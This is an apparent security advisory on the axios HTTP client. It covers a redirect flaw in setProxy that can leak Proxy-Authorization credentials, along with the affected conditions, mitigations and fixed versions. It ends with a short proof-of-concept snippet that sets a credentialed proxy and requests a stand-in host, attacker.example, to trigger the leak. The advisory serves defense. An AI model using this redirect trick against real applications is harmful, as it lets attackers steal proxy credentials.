This vulnerability is trending on Twitter; this may indicate a growing threat.
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsUpgrade axios to version 0.32.0, 1.16.0 or higher.
axios is a promise-based HTTP client for the browser and Node.js.
Affected versions of this package are vulnerable to Insertion of Sensitive Information Into Sent Data in the setProxy function. An attacker can obtain sensitive proxy credentials by controlling a redirect target and causing the application to follow a redirect from a proxied request to a direct connection, resulting in the Proxy-Authorization header being sent to the attacker's server.
Note:
This is only exploitable if the application is running in Node.js with automatic redirects enabled and uses an authenticated proxy configuration, where the redirect target resolves to a direct connection (such as when HTTPS_PROXY is unset or excluded by NO_PROXY).
This vulnerability can be mitigated by setting maxRedirects: 0 and handling redirects manually, or by ensuring proxy environment variables are configured consistently across protocols to prevent unexpected changes from proxied to direct connections.
process.env.HTTP_PROXY = 'http://user:pass@127.0.0.1:8080';
delete process.env.HTTPS_PROXY;
await axios.get('http://attacker.example/start');